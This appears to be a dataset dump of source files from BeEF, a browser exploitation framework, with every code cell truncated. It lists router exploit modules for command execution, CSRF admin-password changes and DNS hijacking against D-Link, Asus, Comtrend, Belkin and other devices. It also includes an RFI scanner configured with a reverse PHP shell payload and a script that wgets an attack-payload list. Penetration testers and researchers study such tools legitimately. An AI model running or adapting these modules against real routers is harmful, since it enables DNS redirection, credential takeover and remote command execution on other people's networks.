language stringlengths 0 24 | filename stringlengths 9 214 | code stringlengths 99 9.93M |
|---|---|---|
Ruby | beef/modules/exploits/rfi_scanner/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Rfi_scanner < BeEF::Core::Command
def pre_send
lhost = '127.0.0.1'
lport = 4444
payload = 'reverse_php'
@datastore.e... |
Text | beef/modules/exploits/rfi_scanner/rfi.txt | # Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => htt... |
beef/modules/exploits/rfi_scanner/update-list | #!/bin/sh
echo "[*] Deleting old rfi.txt..."
rm rfi.txt
echo "[*] Downloading latest rfi.txt..."
wget "https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt" | |
JavaScript | beef/modules/exploits/router/3com_officeconnect_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var path = 'utility.cgi';
var cmd = '<%= @cmd %>';
var timeout = 1... |
YAML | beef/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
com_officeconnect_cmd_exec:
enable: true
category: ["Exploits", "Router"]
name... |
Ruby | beef/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Com_officeconnect_cmd_exec < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', '... |
JavaScript | beef/modules/exploits/router/actiontec_q1000_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var user = '<%= @user %>';
var passwd = '<%= @password %>';
var port ... |
YAML | beef/modules/exploits/router/actiontec_q1000_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
actiontec_q1000_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Act... |
Ruby | beef/modules/exploits/router/actiontec_q1000_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Actiontec_q1000_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/argw4_adsl_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/form2Dns.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 =... |
YAML | beef/modules/exploits/router/argw4_adsl_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40901/
#
beef:
module:
argw4_adsl_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/argw4_adsl_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Argw4_adsl_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' =... |
JavaScript | beef/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var path = 'cgi-bin/script?system%20';
var cmd = '<%= @cmd %>';
v... |
YAML | beef/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
asmax_ar804gu_cmd_exec:
enable: true
category: ["Exploits", "Router"]
name: "A... |
Ruby | beef/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'valu... |
JavaScript | beef/modules/exploits/router/asus_dslx11_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/asus_dslx11_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40373/
#
beef:
module:
asus_dslx11_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/asus_dslx11_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Asus_dslx11_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' ... |
JavaScript | beef/modules/exploits/router/asus_rt_n12e_get_info/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var target_ip = '<%= @target_ip %>';
load_script = function(url) {
var s = document.createElement("... |
YAML | beef/modules/exploits/router/asus_rt_n12e_get_info/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
asus_rt_n12e_get_info:
enable: true
category: ["Exploits", "Router"]
name: "As... |
Ruby | beef/modules/exploits/router/asus_rt_n12e_get_info/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Asus_rt_n12e_get_info < BeEF::Core::Command
def self.options
[
{ 'name' => 'target_ip', 'ui_label' => 'Target Host', 'valu... |
JavaScript | beef/modules/exploits/router/asus_rt_n66u_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var exec_command = '<%= @exec_command %>';
var timeout = 15;
var asus_... |
YAML | beef/modules/exploits/router/asus_rt_n66u_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
asus_rt_n66u_cmd_exec:
enable: true
category: ["Exploits", "Router"]
name: "As... |
Ruby | beef/modules/exploits/router/asus_rt_n66u_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Asus_rt_n66u_cmd_exec < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value... |
JavaScript | beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/42196/
#
beef:
module:
beetel_bcm96338_router_dns_hijack:
enable... |
Ruby | beef/modules/exploits/router/beetel_bcm96338_router_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Beetel_bcm96338_router_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host... |
JavaScript | beef/modules/exploits/router/belkin_dns_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var proto = 'http'
var rhost = '<%= @rhost %>';
var dns1 = '<%= @dns1 %>';
var dns2 ... |
YAML | beef/modules/exploits/router/belkin_dns_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Tested on F1PI242EGau_V1.00.002 and F1PI242EGau_V1.00.009
#
beef:
module:
belkin_dns_csrf:
enable: true
... |
Ruby | beef/modules/exploits/router/belkin_dns_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Belkin_dns_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.... |
JavaScript | beef/modules/exploits/router/bt_home_hub_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var bt_home_hub_i... |
YAML | beef/modules/exploits/router/bt_home_hub_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits", "Router"]
name: "BT Home... |
Ruby | beef/modules/exploits/router/bt_home_hub_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Bt_home_hub_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => ... |
JavaScript | beef/modules/exploits/router/cisco_e2400_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var cisco_e2400_i... |
YAML | beef/modules/exploits/router/cisco_e2400_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
cisco_e2400_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Cisco E... |
Ruby | beef/modules/exploits/router/cisco_e2400_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Cisco_e2400_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => ... |
JavaScript | beef/modules/exploits/router/comtrend_ct5367_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe... |
YAML | beef/modules/exploits/router/comtrend_ct5367_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Com... |
Ruby | beef/modules/exploits/router/comtrend_ct5367_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Comtrend_ct5367_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/comtrend_ct5624_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe... |
YAML | beef/modules/exploits/router/comtrend_ct5624_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Com... |
Ruby | beef/modules/exploits/router/comtrend_ct5624_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Comtrend_ct5624_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/comtrend_ct_series_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/comtrend_ct_series_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40372/
#
beef:
module:
comtrend_ct_series_dns_hijack:
enable: tr... |
Ruby | beef/modules/exploits/router/comtrend_ct_series_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Comtrend_ct_series_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', '... |
JavaScript | beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var host = '<%= @host %>';
var cmd = '<%= @cmd %>';
var path = 'cgi-bin/;';
if (!host.match... |
YAML | beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
ddwrt_v24_sp1_cmd_exec:
enable: true
category: ['Exploits', 'Router']
name: 'D... |
Ruby | beef/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Ddwrt_v24_sp1_cmd_exec < BeEF::Core::Command
def self.options
[
{
'name' => 'host',
'ui_label' => 'Router ... |
JavaScript | beef/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var host = '<%= @host %>';
var password = '<%= @password %>';
var port = '<%= @port %>';
... |
YAML | beef/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
ddwrt_v24_sp1_csrf:
enable: true
category: ['Exploits', 'Router']
name: 'DD-WR... |
Ruby | beef/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Ddwrt_v24_sp1_csrf < BeEF::Core::Command
def self.options
[
{
'name' => 'host',
'ui_label' => 'Router web ... |
JavaScript | beef/modules/exploits/router/dlink_dir_615_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dir615_iframe... |
YAML | beef/modules/exploits/router/dlink_dir_615_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
dlink_dir_615_csrf:
enable: true
category: ["Exploits", "Router"]
name: "D-Lin... |
Ruby | beef/modules/exploits/router/dlink_dir_615_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dir_615_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' =... |
JavaScript | beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/ddnsmngr.cmd';
var dns1 = '<%= @dns1 %>';
var dns2 =... |
YAML | beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.exploit-db.com/exploits/36105/
#
beef:
module:
dlink_2640b_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_2640b_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' ... |
JavaScript | beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/42195/
#
beef:
module:
dlink_dsl2640u_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dsl2640u_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'valu... |
JavaScript | beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/Forms/dns_1';
var dns1 = '<%= @dns1 %>';
var dns2 = ... |
YAML | beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.exploit-db.com/exploits/35917/
#
beef:
module:
dlink_dsl2740r_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dsl2740r_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'valu... |
JavaScript | beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/37237/
#
beef:
module:
dlink_dsl2780b_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dsl2780b_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'valu... |
JavaScript | beef/modules/exploits/router/dlink_dsl500t_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dsl500t_ifram... |
YAML | beef/modules/exploits/router/dlink_dsl500t_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits", "Router"]
name: "D-Lin... |
Ruby | beef/modules/exploits/router/dlink_dsl500t_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dsl500t_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' =... |
JavaScript | beef/modules/exploits/router/dlink_dsl526b_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/dlink_dsl526b_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/37241/
#
beef:
module:
dlink_dsl526b_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/dlink_dsl526b_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dsl526b_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value... |
JavaScript | beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = ... |
YAML | beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40367/
#
beef:
module:
exper_ewm01_adsl_dns_hijack:
enable: true... |
Ruby | beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Exper_ewm01_adsl_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'va... |
JavaScript | beef/modules/exploits/router/huawei_smartax_mt880/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var username = '<%= @username %>';
var passwd = '<%= @password %>';
... |
YAML | beef/modules/exploits/router/huawei_smartax_mt880/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
category: ["Exploits", "Router"]
name:... |
Ruby | beef/modules/exploits/router/huawei_smartax_mt880/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Huawei_smartax_mt880_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'v... |
JavaScript | beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/42192/
#
beef:
module:
iball_baton_ib_wra150n_dns_hijack:
enable... |
Ruby | beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
